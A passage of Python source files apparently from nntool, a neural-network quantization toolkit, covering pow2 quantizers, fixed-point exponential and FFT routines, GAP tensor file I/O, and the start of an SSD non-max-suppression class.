# return QRec(ktype=cls.KTYPE, in_qs=in_qs, out_qs=[deepcopy(forced_in_qs[0])])
# if all the inputs are not the same then force all of them to the maximum input size with a Q that
# fits the most int bits
common_q = cls._get_common_q(in_qs)
in_qs = [deepcopy(common_q) for _ in in_qs]
return QRec(ktype=cls.KTYPE, in_qs=in_qs, out_qs=[deepcopy(common_q)])
KTYPE=None
@classmethod
@abstractmethod
def _get_common_q(cls, in_qs):
pass
```
#### File: quantization/quantizers/no_change_mixin.py
```python
import logging
from copy import deepcopy
from quantization.qtype import QType
from quantization.new_qrec import QRec
LOG = logging.getLogger('nntool.' + __name__)
class NoChangeMixin():
@classmethod
def _handle(cls, params, in_qs, _, ktype, **kwargs):
force_out_qs = kwargs.get('force_out_qs')
force_out_q = force_out_qs and force_out_qs[0]
forced_in_qs = [in_q for in_q in in_qs if in_q.forced]
# two inputs cannot be forced to different values
if forced_in_qs and not QType.forced_equal(*forced_in_qs):
LOG.debug(
'two input qtypes of %s are forced to different qtypes - rejecting', params.name)
return None
# input cannot be forced to different value than output
if force_out_q and not force_out_q.can_force(force_out_q, *in_qs):
LOG.debug(
'output and input of %s are forced to different qtypes - rejecting', params.name)
return None
backwards = kwargs.get('backwards')
if backwards:
if force_out_q:
in_qs = [deepcopy(force_out_q) for _ in in_qs]
return QRec(in_qs=in_qs, out_qs=[deepcopy(force_out_q)], ktype=ktype)
elif force_out_q and not all(in_q == force_out_q for in_q in in_qs):
# if going forwards and our output is forced and does not match input then
# we cannot satisfy
LOG.debug(
"output of %s is forced and inputs don't match - rejecting", params.name)
return None
return QRec(in_qs=in_qs, out_qs=[deepcopy(in_qs[0])], ktype=ktype)
```
#### File: symmetric/quantizers/expression_fusion_pow2.py
```python
import logging
import numpy as np
from expressions.symbolic.q15_quantization.q15_scaled_quantization import \
Q15ScaledQuantization
from expressions.symbolic.symbol import SymbolStats
from graph.types import ExpressionFusionParameters
from quantization.new_qrec import QRec
from quantization.qtype import QType
from quantization.qtype_constraint import MatchAll
from quantization.unified_quantization_handler import (in_qs_constraint,
out_qs_constraint,
params_type)
from ..pow2_quantization_handler import Pow2QuantizionHandler
LOG = logging.getLogger('nntool.' + __name__)
@params_type(ExpressionFusionParameters)
@in_qs_constraint(MatchAll({'dtype': np.int16}))
@out_qs_constraint(MatchAll({'dtype': np.int16}))
class ExpressionFusionPow2(Pow2QuantizionHandler):
@classmethod
def _quantize(cls, params, in_qs, stats, **kwargs):
force_out_qs, out_dtype = cls.get_pow2_opts(**kwargs)
if stats is None or 'expression' not in stats:
raise ValueError(
f'no valid range information is present for {params.name}')
# expressions need a symmetric input
# this is done on the mult8 version but probably isn't necessary here
# in_qs = cls.force_symmetric(in_qs)
symbol_control = SymbolStats(stats['expression'])
# preload the input and output quantization
# This will force variables to the right scales in the expression quantizer
# first the input
prequant = {params.input_symbols[idx]: in_q
for idx, in_q in enumerate(in_qs)}
# now the output
o_qs = []
for idx, sym_name in enumerate(params.output_symbols):
if force_out_qs and force_out_qs[idx]:
o_q = force_out_qs[idx]
else:
cls.check_valid_ranges(params, stats, idx=idx, dirs='out')
o_q = QType.from_min_max_pow2(stats['range_out'][idx]['min'],
stats['range_out'][idx]['max'],
dtype=out_dtype)
prequant[sym_name] = o_q
o_qs.append(o_q)
qfunc_col = params.func_col.quantize(Q15ScaledQuantization,
symbol_control,
quantize_inputs=False,
qtypes=prequant)
return QRec.symmetric(in_qs=in_qs, out_qs=o_qs, qfunc_col=qfunc_col)
@classmethod
def get_prefered_input_dtypes(cls, params, **kwargs):
# only works in 16 bit mode
return [np.int16 for _ in params.in_dims]
```
#### File: symmetric/quantizers/filter_pow2.py
```python
import logging
from copy import deepcopy
import math
import numpy as np
from graph.types import (Conv2DParameters, FcParameters,
MultiplicativeBiasParameters)
from quantization.new_qrec import QRec
from quantization.qtype import QType
from quantization.quantizer_options import BIAS_SIZE_OPTION
from quantization.unified_quantization_handler import (in_qs_constraint,
out_qs_constraint,
params_type, options)
from utils.node_id import NodeId
from utils.stats_funcs import calc_bits
from ..pow2_quantization_handler import Pow2QuantizionHandler
LOG = logging.getLogger('nntool.' + __name__)
@options(
BIAS_SIZE_OPTION
)
@params_type(FcParameters, Conv2DParameters)
# @can_dequantize(True)
@in_qs_constraint({'dtype': set([np.int8, np.int16])})
@out_qs_constraint({'dtype': set([np.int8, np.int16])})
class FilterPow2(Pow2QuantizionHandler):
@classmethod
def get_weights_and_biases_nodes(cls, G, params):
edges = G.indexed_in_edges(params.name)
if len(edges) != 3:
raise ValueError(f"didn't find 3 input edges on {params.name}")
return edges[1].from_node, edges[2].from_node
@classmethod
def _quantize(cls, params, in_qs, stats, **kwargs):
force_out_qs, params_dtype = cls.get_pow2_opts(**kwargs)
force_out_q = force_out_qs and force_out_qs[0]
fusion = kwargs.get('fusion', None)
pow2_biases = kwargs.get('opts')['pow2_biases']
G = kwargs['G']
weights_node, biases_node = cls.get_weights_and_biases_nodes(
G, fusion if fusion else params)
range_acc = stats.get('range_acc', stats['range_out'][0])
conv_active = fusion and fusion.fusion_type in [
'conv_active_pool', 'conv_active']
int_dtype = np.int32
cls.check_valid_ranges(params, stats, idx=0, dirs='out')
if conv_active:
# Take stats from activation after the convolution
range_out = kwargs['all_stats'][NodeId(
fusion, fusion.contained_nodes()[1])]['range_out'][0]
out_dtype = np.int32
else:
out_dtype = params_dtype
range_out = stats['range_out'][0]
in_q = deepcopy(in_qs[0]).scale_to_pow2()
calc_width = 31
o_q = QType.from_min_max_pow2(range_out['min'],
range_out['max'],
dtype=out_dtype)
if force_out_q:
if o_q.scale > force_out_q.scale:
return None
weights_q = QType.from_array_pow2(arr=weights_node.dqvalue,
dtype=params_dtype)
calc_q = in_q.q + weights_q.q
acc_bits = calc_bits(range_acc['max'], range_acc['min'])
act_bits = calc_bits(range_out['min'], range_out['max'])
act_acc_bits = max(acc_bits, act_bits)
calc_int_bits = calc_width - calc_q
if calc_int_bits < act_acc_bits:
# we don't have enough space for the integer portion so reduce the precision of
# the weights and input
missing_bits = act_acc_bits - calc_int_bits
if missing_bits > calc_q * 0.75:
raise ValueError(f'Quantizing {params.name} at this precision will loose more than 75% of fractional part')
prec_inp = min(math.floor(0.5 + missing_bits * in_q.q/calc_q), in_q.q)
prec_w = min(math.floor(0.5 + missing_bits * weights_q.q/calc_q), weights_q.q)
left = missing_bits - prec_inp - prec_w
if left > 0:
prec_w += left
LOG.warning(
'reducing weight and input precision (%s, %s) in %s to satisfy quantization constraints', prec_w, prec_inp, params.name)
weights_q.q -= prec_w
in_q.q -= prec_inp
calc_q = in_q.q + weights_q.q
calc_int_bits = calc_width - calc_q
c_q = acc_q = QType(bits=calc_width, q=calc_q, signed=True)
if conv_active:
o_q = c_q
if pow2_biases == 0:
biases_dtype = params_dtype
elif pow2_biases == 8:
biases_dtype = np.int8
elif pow2_biases == 16:
biases_dtype = np.int16
else:
biases_dtype = np.int32
biases_q = QType.from_array_pow2(arr=biases_node.dqvalue,
dtype=biases_dtype)
# make sure that the biases are not stored more precisily than the accumulator. It's pointless and will
# cause a negative shift
if biases_q.q > acc_q.q:
biases_q.q = acc_q.q
if isinstance(params, MultiplicativeBiasParameters) and params.has_mul_bias:
mb_q = QType.from_array_pow2(arr=params.mul_biases,
dtype=int_dtype)
else:
mb_q = None
return QRec.symmetric(in_qs=[in_q, weights_q, biases_q], out_qs=[o_q], calc_q=c_q,
acc_q=acc_q,
mul_biases_q=mb_q)
```
#### File: nntool/utils/exp_17_15.py
```python
import numpy as np
# static unsigned short int IntegerExpLUT[] =
# {
INTEGER_EXP_LUT = np.array([0x0001, 0x0002, 0x0007, 0x0014, 0x0036, 0x0094,
0x0193, 0x0448, 0x0BA4, 0x1FA7, 0x560A, 0xE9E2], dtype=np.uint16)
# };
# static unsigned short int FractionExpLUT[] =
# {
FRACTION_EXP_LUT = np.array([0x0000, 0x5BF1, 0x31CD, 0x0AF3, 0x4C90, 0x34E2,
0x36E3, 0x510B, 0x7A9F, 0x0ABE, 0x3B9F, 0x1224], dtype=np.uint16)
# };
# /* 17.15 fixed point format */
# static unsigned short int ExpCoeffLUT[] =
# {
EXP_COEFF_LUT = np.array([0x7FFF, 0x7FFF, 0x4000, 0x1555, 0x0555, 0x0111, 0x002E, 0x0007, 0x0001])
# };
def gap_bitextractu(x, size, off):
mask = (np.array([1], dtype=np.uint32) << size) - 1
return (x >> off) & mask
def gap_mulsRN(x, y, n):
rounding = np.array([1], dtype=np.int32) << (n - 1)
return (np.multiply(x.astype(np.int16),
y.astype(np.int16), dtype=np.int32) + rounding) >> n
def gap_mulRN(x, y, n):
rounding = np.array([1], dtype=np.int32) << (n - 1)
return (np.multiply(x.astype(np.uint16),
y.astype(np.uint16), dtype=np.int32) + rounding) >> n
def gap_roundnorm(x, scale):
rounding = np.array([1], dtype=np.int32) << (scale - 1)
return (x.astype(np.int32) + rounding) >> scale
def gap_roundnorm_reg(x, scale):
rounding = np.where(x != 0, np.array([1], dtype=np.int32) << (scale - 1), 0)
return (x.astype(np.int32) + rounding) >> scale
def exp_fp_17_15(X):
X = X.astype(np.uint32)
result = np.zeros(X.shape, dtype=np.int32)
zero_mask = X == 0
result[zero_mask] = 0x8000
non_zero_mask = np.logical_not(zero_mask)
Y = np.ndarray(X.shape, dtype=np.int32)
Y[non_zero_mask] = np.abs(X[non_zero_mask].astype(np.int32))
int_x = np.ndarray(X.shape, dtype=np.int32)
int_x[non_zero_mask] = Y[non_zero_mask] >> 15
overflow_mask = np.logical_and(int_x >= (len(INTEGER_EXP_LUT) - 1), non_zero_mask)
result[np.logical_and(X == Y, overflow_mask)] = 0x7FFFFFF
result[np.logical_and(X != Y, overflow_mask)] = 0
non_zero_mask[overflow_mask] = False
fract_x = np.ndarray(X.shape, dtype=np.int32)
fract_x[non_zero_mask] = Y[non_zero_mask] & 0x7FFF
bit_extract_mask = np.logical_and(non_zero_mask, gap_bitextractu(fract_x, 1, 14))
fract_x[bit_extract_mask] -= 0x8000
int_x[bit_extract_mask] += 1
scaled_int = np.ndarray(X.shape, dtype=np.int32)
scaled_int[non_zero_mask] = INTEGER_EXP_LUT[int_x[non_zero_mask]]
scaled_fract = np.ndarray(X.shape, dtype=np.uint16)
scaled_fract[non_zero_mask] = FRACTION_EXP_LUT[int_x[non_zero_mask]]
fract_x_s = fract_x.astype(np.int16)
z_s = fract_x.astype(np.int16)
for i in range(1, len(EXP_COEFF_LUT)):
result[non_zero_mask] += z_s[non_zero_mask].astype(np.int32) * EXP_COEFF_LUT[i]
z_s[non_zero_mask] = gap_mulsRN(z_s[non_zero_mask], fract_x_s[non_zero_mask], 15)
result[non_zero_mask] = gap_roundnorm(result[non_zero_mask], 15) + EXP_COEFF_LUT[0]
unsigned_res = result.astype(np.uint16)
result[non_zero_mask] = (gap_mulRN(unsigned_res[non_zero_mask],
scaled_fract[non_zero_mask], 15)\
+ unsigned_res[non_zero_mask] * scaled_int[non_zero_mask])
neg_mask = np.logical_and(np.logical_and(non_zero_mask, result != 0), X > 0x7FFFFFFF)
result[neg_mask] = ((0x7FFFFFFF)//result[neg_mask]) >> 1
return result.astype(np.uint32)
```
#### File: nntool/utils/fft_quant.py
```python
import numpy as np
from copy import deepcopy
def Rad2_FFT_DIF_Fix16(In_Data, Twiddles, N_fft):
Data = deepcopy(In_Data)
iLog2N = int(np.log2(N_fft))
iL = 1
iM = N_fft // 2
for iCnt1 in range(iLog2N-3):
iQ = 0
for iCnt2 in range(0, iM):
Wr = np.int64(Twiddles[0, iQ])
Wi = np.int64(Twiddles[1, iQ])
iA = iCnt2
for iCnt3 in range(iL):
iB = iA + iM
Tmpr = np.int64(Data[0, iA]) - Data[0, iB]
Tmpi = np.int64(Data[1, iA]) - Data[1, iB]
Data[0, iA] = np.int16((np.int32(Data[0, iA]) + Data[0, iB]) >> 1)
Data[1, iA] = np.int16((np.int32(Data[1, iA]) + Data[1, iB]) >> 1)
Data[0, iB] = np.int16((((Tmpr*Wr) - (Tmpi*Wi)) >> 15) >> 1)
Data[1, iB] = np.int16((((Tmpr*Wi) + (Tmpi*Wr)) >> 15) >> 1)
iA = iA + 2 * iM
iQ = iQ + iL
iL *= 2
iM //= 2
iQ = 0
iM = 4
iL = int(N_fft) >> 3
for iCnt2 in range(0, iM):
Wr = Twiddles[0, iQ]
Wi = Twiddles[1, iQ]
iA = iCnt2
for iCnt3 in range(iL):
iB = iA + iM
Tmpr = np.int64(Data[0, iA]) - Data[0, iB]
Tmpi = np.int64(Data[1, iA]) - Data[1, iB]
Data[0, iA] = np.int16((np.int32(Data[0, iA]) + Data[0, iB]))
Data[1, iA] = np.int16((np.int32(Data[1, iA]) + Data[1, iB]))
Data[0, iB] = np.int16((((Tmpr*Wr) - (Tmpi*Wi)) >> 15))
Data[1, iB] = np.int16((((Tmpr*Wi) + (Tmpi*Wr)) >> 15))
iA = iA + 2 * iM
iQ += iL
iQ = 0
iM = 2
iL = int(N_fft) >> 2
for iCnt2 in range(0, iM):
Wr = Twiddles[0, iQ]
Wi = Twiddles[1, iQ]
iA = iCnt2
for iCnt3 in range(iL):
iB = iA + iM
Tmpr = np.int64(Data[0, iA]) - Data[0, iB]
Tmpi = np.int64(Data[1, iA]) - Data[1, iB]
Data[0, iA] = np.int16((np.int32(Data[0, iA]) + Data[0, iB]))
Data[1, iA] = np.int16((np.int32(Data[1, iA]) + Data[1, iB]))
Data[0, iB] = np.int16((((Tmpr*Wr) - (Tmpi*Wi)) >> 15))
Data[1, iB] = np.int16((((Tmpr*Wi) + (Tmpi*Wr)) >> 15))
iA = iA + 2 * iM
iQ += iL
iM = 1
iL = N_fft // 2
iA = 0
for iCnt3 in range(iL):
iB = iA + iM
Tmpr = np.int32(Data[0, iA]) - Data[0, iB]
Tmpi = np.int32(Data[1, iA]) - Data[1, iB]
Data[0, iA] = np.int16((np.int32(Data[0, iA]) + Data[0, iB]))
Data[1, iA] = np.int16((np.int32(Data[1, iA]) + Data[1, iB]))
Data[0, iB] = np.int16(Tmpr)
Data[1, iB] = np.int16(Tmpi)
iA = iA + 2 * iM
return Data
def Rad4_FFT_DIF_Fix16(In_Data, Twiddles, N_fft):
Data = deepcopy(In_Data)
iLog4N = int(np.log2(N_fft)) >> 1
iL = 1
iM = N_fft // 4
for iCnt1 in range(iLog4N-2):
iQ = 0
for iCnt2 in range(0, iM):
W1r = Twiddles[0, iQ]
W1i = Twiddles[1, iQ]
W2r = Twiddles[0, iQ*2]
W2i = Twiddles[1, iQ*2]
W3r = Twiddles[0, iQ*3]
W3i = Twiddles[1, iQ*3]
iA = iCnt2
for iCnt3 in range(iL):
A1r = ((np.int32(Data[0, iA]) + Data[0, iA+2*iM]) + (Data[0, iA+iM] + Data[0, iA+3*iM]))
A1i = ((np.int32(Data[1, iA]) + Data[1, iA+2*iM]) + (Data[1, iA+iM] + Data[1, iA+3*iM]))
B1r = ((np.int32(Data[0, iA]) - Data[0, iA+2*iM]) + (Data[1, iA+iM] - Data[1, iA+3*iM]))
B1i = ((np.int32(Data[1, iA]) - Data[1, iA+2*iM]) - (Data[0, iA+iM] - Data[0, iA+3*iM]))
C1r = ((np.int32(Data[0, iA]) + Data[0, iA+2*iM]) - (Data[0, iA+iM] + Data[0, iA+3*iM]))
C1i = ((np.int32(Data[1, iA]) + Data[1, iA+2*iM]) - (Data[1, iA+iM] + Data[1, iA+3*iM]))
D1r = ((np.int32(Data[0, iA]) - Data[0, iA+2*iM]) - (Data[1, iA+iM] - Data[1, iA+3*iM]))
D1i = ((np.int32(Data[1, iA]) - Data[1, iA+2*iM]) + (Data[0, iA+iM] - Data[0, iA+3*iM]))
Tmp = B1r
B1r = np.int64(B1r*W1r - B1i*W1i) >> 15
B1i = np.int64(Tmp*W1i + B1i*W1r) >> 15
Tmp = C1r
C1r = np.int64(C1r*W2r - C1i*W2i) >> 15
C1i = np.int64(Tmp*W2i + C1i*W2r) >> 15
Tmp = D1r
D1r = np.int64(D1r*W3r - D1i*W3i) >> 15
D1i = np.int64(Tmp*W3i + D1i*W3r) >> 15
Data[0, iA ] = np.int16(A1r >> 2)
Data[1, iA ] = np.int16(A1i >> 2)
Data[0, iA+ iM] = np.int16(B1r >> 2)
Data[1, iA+ iM] = np.int16(B1i >> 2)
Data[0, iA+2*iM] = np.int16(C1r >> 2)
Data[1, iA+2*iM] = np.int16(C1i >> 2)
Data[0, iA+3*iM] = np.int16(D1r >> 2)
Data[1, iA+3*iM] = np.int16(D1i >> 2)
iA = iA + 4 * iM
iQ += iL
iL = iL * 4
iM = iM // 4
iQ = 0
iM = 4
iL = N_fft // 16
for iCnt2 in range(0, iM):
W1r = Twiddles[0, iQ]
W1i = Twiddles[1, iQ]
W2r = Twiddles[0, iQ*2]
W2i = Twiddles[1, iQ*2]
W3r = Twiddles[0, iQ*3]
W3i = Twiddles[1, iQ*3]
iA = iCnt2
for iCnt3 in range(iL):
A1r = ((np.int32(Data[0, iA]) + Data[0, iA+2*iM]) + (Data[0, iA+iM] + Data[0, iA+3*iM]))
A1i = ((np.int32(Data[1, iA]) + Data[1, iA+2*iM]) + (Data[1, iA+iM] + Data[1, iA+3*iM]))
B1r = ((np.int32(Data[0, iA]) - Data[0, iA+2*iM]) + (Data[1, iA+iM] - Data[1, iA+3*iM]))
B1i = ((np.int32(Data[1, iA]) - Data[1, iA+2*iM]) - (Data[0, iA+iM] - Data[0, iA+3*iM]))
C1r = ((np.int32(Data[0, iA]) + Data[0, iA+2*iM]) - (Data[0, iA+iM] + Data[0, iA+3*iM]))
C1i = ((np.int32(Data[1, iA]) + Data[1, iA+2*iM]) - (Data[1, iA+iM] + Data[1, iA+3*iM]))
D1r = ((np.int32(Data[0, iA]) - Data[0, iA+2*iM]) - (Data[1, iA+iM] - Data[1, iA+3*iM]))
D1i = ((np.int32(Data[1, iA]) - Data[1, iA+2*iM]) + (Data[0, iA+iM] - Data[0, iA+3*iM]))
Tmp = B1r
B1r = np.int64(B1r*W1r - B1i*W1i) >> 15
B1i = np.int64(Tmp*W1i + B1i*W1r) >> 15
Tmp = C1r
C1r = np.int64(C1r*W2r - C1i*W2i) >> 15
C1i = np.int64(Tmp*W2i + C1i*W2r) >> 15
Tmp = D1r
D1r = np.int64(D1r*W3r - D1i*W3i) >> 15
D1i = np.int64(Tmp*W3i + D1i*W3r) >> 15
Data[0, iA ] = np.int16(A1r)
Data[1, iA ] = np.int16(A1i)
Data[0, iA+ iM] = np.int16(B1r)
Data[1, iA+ iM] = np.int16(B1i)
Data[0, iA+2*iM] = np.int16(C1r)
Data[1, iA+2*iM] = np.int16(C1i)
Data[0, iA+3*iM] = np.int16(D1r)
Data[1, iA+3*iM] = np.int16(D1i)
iA = iA + 4 * iM
iQ += iL
iM = 1
iL = N_fft // 4
iA = 0
for iCnt3 in range(iL):
Ar = np.int32(Data[0, iA])
Ai = np.int32(Data[1, iA])
Br = np.int32(Data[0, iA+iM])
Bi = np.int32(Data[1, iA+iM])
Cr = np.int32(Data[0, iA+2*iM])
Ci = np.int32(Data[1, iA+2*iM])
Dr = np.int32(Data[0, iA+3*iM])
Di = np.int32(Data[1, iA+3*iM])
Data[0, iA ] = np.int16(Ar + Cr + Br + Dr)
Data[1, iA ] = np.int16(Ai + Ci + Bi + Di)
Data[0, iA+ iM] = np.int16(Ar - Cr + Bi - Di)
Data[1, iA+ iM] = np.int16(Ai - Ci - Br + Dr)
Data[0, iA+2*iM] = np.int16(Ar + Cr - Br - Dr)
Data[1, iA+2*iM] = np.int16(Ai + Ci - Bi - Di)
Data[0, iA+3*iM] = np.int16(Ar - Cr - Bi + Di)
Data[1, iA+3*iM] = np.int16(Ai - Ci + Br - Dr)
iA = iA + 4 * iM
return Data
def SwapSamples(In_Data, SwapTable):
Data = deepcopy(In_Data)
for i, swap_idx in enumerate(SwapTable):
if i < swap_idx:
Sr = Data[0, i]
Si = Data[1, i]
Data[0, i] = Data[0, swap_idx]
Data[1, i] = Data[1, swap_idx]
Data[0, swap_idx] = Sr
Data[1, swap_idx] = Si
return Data
def RFFT_Step_Fix16(In_Data, RTwiddles, N_fft):
RFFT_Out = np.zeros((2, N_fft//2+1))
xBR = np.int32(In_Data[0, 0]) >> 2
xBI = np.int32(In_Data[1, 0]) >> 2
xAR = np.int32(In_Data[0, 0]) >> 2
xAI = np.int32(In_Data[1, 0]) >> 2
RFFT_Out[0, 0] = (xBR + xAR + xBI + xAI)
RFFT_Out[1, 0] = (xAI - xBI + xBR - xAR)
k = N_fft // 2 - 1
for i in range(k):
twr, twi = np.int64(RTwiddles[0, 1+i]), np.int64(RTwiddles[1, 1+i])
xar, xai = np.int32(In_Data [0, 1+i]), np.int32(In_Data [1, 1+i])
xbr, xbi = np.int32(In_Data [0, k-i]), np.int32(In_Data [1, k-i])
t1r = np.int32((-xar + xbr) >> 2)
t1i = np.int32((-xai - xbi) >> 2)
t2r = np.int32(( xar + xbr) >> 2)
t2i = np.int32(( xai - xbi) >> 2)
RFFT_Out[0, i+1] = np.int16(((twr*t1r - twi*t1i) >> 15) + t2r)
RFFT_Out[1, i+1] = np.int16(((twr*t1i + twi*t1r) >> 15) + t2i)
xBR = np.int32(In_Data[0, k-(k-1)]) >> 2
xBI = np.int32(In_Data[1, k-(k-1)]) >> 2
xAR = np.int32(In_Data[0, 1+(k-1)]) >> 2
xAI = np.int32(In_Data[1, 1+(k-1)]) >> 2
RFFT_Out[0, k+1] = np.int16( xBR + xAR - xBI - xAI )
RFFT_Out[1, k+1] = np.int16(0) #( xAI - xBI - xBR + xAR )
return RFFT_Out
```
#### File: nntool/utils/gap_tensor_file.py
```python
import logging
import os
import struct
from io import BufferedWriter, BufferedReader
import numpy as np
LOG = logging.getLogger("nntool." + __name__)
TYPES = {
8: np.int8,
16: np.int16,
32: np.int32
}
CTYPES = {
np.int8: "signed char",
np.int16: "short int",
np.int32: "int"
}
class Header():
__FMT = '5i4i'
def __init__(self, step, tensor_type, size, elem_size, num_dims, *dims):
self.step = step
self.tensor_type = tensor_type
self.size = size
self.elem_size = elem_size
self.dims = [dims[i] for i in range(num_dims)]
@classmethod
def read(cls, fp: BufferedReader):
buf = fp.read(struct.calcsize(cls.__FMT))
if buf:
return cls(*struct.unpack(cls.__FMT, buf))
return None
def write(self, fp: BufferedWriter):
assert len(self.dims) <= 4, "up to 4 dimensions are supported"
dims = self.dims.copy() + [0] * (4 - len(self.dims))
buf = struct.pack(self.__FMT, self.step, self.tensor_type, self.size, self.elem_size, len(self.dims), *dims)
fp.write(buf)
def write_dims(prefix, fp, dims, elem_size):
assert len(dims) == 3
dim_names = ["CHANNELS", "HEIGHT", "WIDTH"]
for i, v in enumerate(dims):
fp.write('{}_{}?={}\n'.format(prefix, dim_names[i], v))
fp.write('{}_BITS?={}\n'.format(prefix, elem_size))
fp.write('{}_TYPE?={}\n'.format(prefix, CTYPES[TYPES[elem_size]]))
def write_make_include_file(filename, header, output_shape, output_elem_size):
with open(filename, 'w') as fp:
write_dims("INPUT", fp, header.dims, header.elem_size)
write_dims("OUTPUT", fp, output_shape, output_elem_size)
def get_bits(tensor):
bit_size = -1
for k, v in TYPES.items():
if tensor.dtype == v:
bit_size = k
break
if bit_size < 0:
raise ValueError("only int8, int16 and int32 are supported")
return bit_size
def write_gap_tensor(filename, tensor, step=0, output_tensor=None, make_file=None):
bit_size = get_bits(tensor)
with open(filename, 'wb') as fp:
header = Header(step, 0, tensor.size * bit_size // 8, bit_size, len(tensor.shape), *tensor.shape)
header.write(fp)
tensor.tofile(fp)
if output_tensor is not None and make_file is not None:
output_bit_size = get_bits(output_tensor)
write_make_include_file(make_file, header, output_tensor.shape, output_bit_size)
def read_gap_tensors(filename):
tensors = {}
size = os.path.getsize(filename)
max_step = -1
with open(filename, 'rb') as fp:
while fp.tell() < size:
header = Header.read(fp)
if not header:
break
if header.elem_size not in TYPES:
LOG.error("Bit width %s not found in types list. File may be corrupted.",
header.elem_size)
raise ValueError()
tensor = np.fromfile(fp, dtype=TYPES[header.elem_size], count=header.size)
step_rec = tensors.get(header.step)
if not step_rec:
step_rec = [None]*3
tensors[header.step] = step_rec
elem = 0 if header.tensor_type < 2 else header.tensor_type - 1
step_rec[elem] = tensor.reshape(header.dims)
if header.step > max_step:
max_step = header.step
return [tensors.get(i) for i in range(max_step + 1)]
```
#### File: nntool/utils/gen_twiddles.py
```python
import numpy as np
def gen_fft_twiddles_lut(Nfft, Inverse=False, rad4=False):
Phi = (np.pi * 2 / Nfft) * np.arange(0, Nfft)
if Inverse:
Twiddles_real = np.cos(Phi)
Twiddles_imag = np.sin(Phi)
else:
Twiddles_real = np.cos(-Phi)
Twiddles_imag = np.sin(-Phi)
if rad4:
twid = np.empty((2 * int(3*Nfft/4), ), dtype=Twiddles_real.dtype)
twid[0::2] = Twiddles_real[:int(3*Nfft/4)]
twid[1::2] = Twiddles_imag[:int(3*Nfft/4)]
return twid
twid = np.empty((2 * int(Nfft//2), ), dtype=Twiddles_real.dtype)
twid[0::2] = Twiddles_real[:int(Nfft//2)]
twid[1::2] = Twiddles_imag[:int(Nfft//2)]
return twid
def gen_rfft_twiddles_lut(Nfft):
Phi = (np.pi * 2 / Nfft) * np.arange(0, Nfft//2)
Twiddles_real = np.sin(Phi)
Twiddles_imag = np.cos(Phi)
twid = np.empty((Twiddles_real.size + Twiddles_imag.size, ), dtype=Twiddles_real.dtype)
twid[0::2] = Twiddles_real
twid[1::2] = Twiddles_imag
return twid
def gen_fft_swaptable_lut(Ni, rad4=False):
if rad4:
log4 = int(np.log2(Ni) / 2)
iL = Ni / 4
iM = 1
SwapTable = np.zeros(Ni)
for i in range(log4):
for j in range(iM):
SwapTable[j + iM] = SwapTable[j] + iL
SwapTable[j + 2*iM] = SwapTable[j] + 2*iL
SwapTable[j + 3*iM] = SwapTable[j] + 3*iL
iL /= 4
iM *= 4
else:
log2 = int(np.log2(Ni))
iL = Ni / 2
iM = 1
SwapTable = np.zeros(Ni)
for i in range(log2):
for j in range(iM):
SwapTable[j + iM] = SwapTable[j] + iL
iL /= 2
iM *= 2
return SwapTable
def gen_dct_twiddles_lut(Ndct, dct_type=2, norm=None):
norm_factor = np.ones((Ndct, Ndct))
if norm == "ortho" and dct_type == 2:
norm_factor *= np.sqrt(1/(2*Ndct))
norm_factor[0] = np.sqrt(1/(4*Ndct))
if norm == "ortho" and dct_type == 3:
norm_factor *= np.sqrt(1/(2*Ndct))
norm_factor[0] = np.sqrt(1/(Ndct))
DCT_Coeff = np.zeros((Ndct, Ndct))
for k in range(Ndct):
for i in range(Ndct):
if dct_type == 2:
coeff = 2*np.cos(np.pi / (2*Ndct) * k * (2*i + 1))
elif dct_type == 3:
coeff = 1 if i == 0 else 2*np.cos(np.pi / (2*Ndct) * i * (2*k + 1))
else:
raise NotImplementedError("DCT type 2 and 3 only supported")
DCT_Coeff[k, i] = coeff
return (DCT_Coeff * norm_factor)
```
#### File: nntool/utils/ssd_postprocess_nms.py
```python
import copy
import json
import os
from typing import NamedTuple
import numpy as np
class ValException(Exception):
pass
class Detection(NamedTuple):
bboxes: np.array
scores: np.array
classes: np.array
class NonMaxSuppression(object):
'''
Parameters that should be initialized:
- max_detections_per_class
- max_classes_per_detection
- max_total_detections
- iou_threshold
- score_threshold
- regular_nms
'''
def __init__(self, nms_configuration, use_regular_nms=True):
# pylint: disable=no-member,bare-except
'''
# default values of parameters required for nms:
max_classes_per_detection: Maximum number of classes to output per detection box.
detections_per_class: Number of anchors used per class in Regular Non-Max-Suppression.
use_regular_nms: 'Flag to set postprocessing op to use Regular NMS instead of Fast NMS.'
'''
self._max_detections_per_class = 10
self._max_classes_per_detection = 1
self._max_total_detections = 100
self._iou_threshold = 0.3
self._score_threshold = 0.5
self._num_classes = None
self.nms_configuration = nms_configuration
# selection nms method: fast or regular?
if use_regular_nms:
self.nms_core = self._regular_nms
else:
self.nms_core = self._fast_nms
# all allowed keys will be initialized as class attributes
allowed_keys = set(
['using_json_config', 'using_pipeline_config', 'using_params'])
# initialize all allowed keys to false
self.__dict__.update((key, None) for key in allowed_keys)
# and update the given keys by their given values
self.__dict__.update(
(key, value) for key, value in nms_configuration.items() if key in allowed_keys)
'loading params values'
if self.using_json_config['INCLUDE']:
json_config_path = self.using_json_config['json_config_path']
if not os.path.isfile(json_config_path):
raise ValException(
'\n\n the path to the json file is not valid.')
with open(json_config_path) as json_file:
json_data = json.load(json_file)
try:
self.max_detections_per_class = json_data['detections_per_class']
except:
self.max_detections_per_class = self._max_detections_per_class
print('Warning: deafutl assignement for max_detections_per_class: {value} .'
.format(value=self._max_detections_per_class))
try:
self.max_classes_per_detection = json_data['max_classes_per_detection']
except:
self.max_classes_per_detection = self._max_classes_per_detection
print('Warning: deafutl assignement for max_classes_per_detection: {value} .'
.format(value=self._max_classes_per_detection))
try:
self.max_total_detections = json_data['max_detections']
except:
self.max_total_detections = self._max_total_detections
print('Warning: deafutl assignement for max_total_detections: {value} .'
.format(value=self._max_total_detections))
try:
self.iou_threshold = json_data['nms_iou_threshold']
except:
self.iou_threshold = self._iou_threshold
print('Warning: deafutl assignement for iou_threshold: {value} .'
.format(value=self._iou_threshold))
try:
self.score_threshold = json_data['nms_score_threshold']
except:
self.score_threshold = self._score_threshold
print('Warning: deafutl assignement for score_threshold: {value} .'
.format(value=self._score_threshold))
try:
self.num_classes = json_data['num_classes']
except:
self.num_classes = self._self.num_classes
print('Warning: deafutl assignement for num_classes: {value} .'
.format(value=self._self.num_classes))
self._output_quantized = json_data['_output_quantized']
self._support_output_type_float_in_quantized_op = json_data[
'_support_output_type_float_in_quantized_op']
elif self.using_pipeline_config['INCLUDE']:
raise ValException('Need to import object_detection from tf')
elif self.using_params['INCLUDE']:
params = self.using_params['params']
# max_detection_per_class is left default
